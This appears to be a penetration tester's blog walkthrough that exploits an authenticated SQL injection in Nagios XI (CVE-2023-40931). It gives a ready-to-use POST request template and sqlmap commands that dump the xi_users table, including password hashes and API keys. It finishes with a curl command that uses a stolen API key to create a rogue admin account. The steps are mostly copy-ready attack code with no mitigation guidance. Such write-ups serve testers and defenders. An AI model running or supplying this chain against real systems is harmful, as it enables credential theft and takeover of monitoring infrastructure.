Notes From The Field: Exploiting Nagios XI SQL Injection (CVE-2023–40931)

This CVE affects Nagios XI 5.11.0 and 5.11.1. It does require authenticated access into the Nagios environment.

URL Reference:

CVE-2023-40931 - GitHub Advisory Database

Description:

A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php

In theory you should be able to do a post request with authenticated access and send an acknowledgement banner request with the ID parameter.

Example:

action=acknowledge_banner_message&id=*

You should be able to refresh the Nagios page you landed on with authenticated access and send a POST request to repeater. In case you want a post request template for this exploit you can do the following. Just replace your cookie and your host fields.

POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: <host_goes_here>
Cookie: nagiosxi=<Authenticated_Cookie_Goes_Here>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

action=acknowledge_banner_message&id=*

Once you send the post request you should recieve a SQL error back, which essentially confirms SQL injection.

Figure 1 — Confirming SQL Injection

Automating SQL injection with SQL map

Having a wildcard in our post request may interfere with automated SQL injection so save your post request from burpsuite with the id=1 instead of id=*.

Your sqlmap command should look like this. Reminder the parameter we are attacking is “id”.

Figure 2 — SQLMAP Request

If all goes correctly you should get some confirmation on the fetching the database names.

Figure 3 — Nagios Database Names

Next, go ahead and fetch the tables from the nagiosxi database with the following request.

sqlmap -r request.txt -p id --threads=10 -D nagiosxi --tables

Figure 4 — Database Tables

There are two different ways I normally dump out tables. You will need to dump all tables names followed by a second command to pull the columns from the tables that are going to give you the most meaningful information.

Dump All Columns from Tables

sqlmap -r request.txt -p id --threads=10 -D nagiosxi -T xi_users --dump

Dump the following columns from the xi_users table

• user_id
• name
• api_key
• password

sqlmap -r request.txt -p id --threads=10 -D nagiosxi -T xi_users -C user_id,name,api_key,password --dump

Figure 5 — API Keys

Exploiting Nagios API Keys

Using searchsploit you will find a ton of Nagios XI RCE’s. After searching through various scripts I ran across a ruby file for a chained RCE that had an exploitation step for API keys.

Figure 6 — Searchsploit Nagios XI RCE

Figure 7 — Admin User POST Request

Constructing an api key request to add an Admin User with CURL

curl -k --silent "http://hostname.domain/nagiosxi/api/v1/system/user&apikey=api_key_here" -d "name=hacker1&username=hacker1&password=Hacker1337email=hacker@localhost&auth_level=admin"

Figure 8 — Curl Request

At this point you should be able login and change the password to your newly created account!

Figure 9 — Nagios XI Admin Panel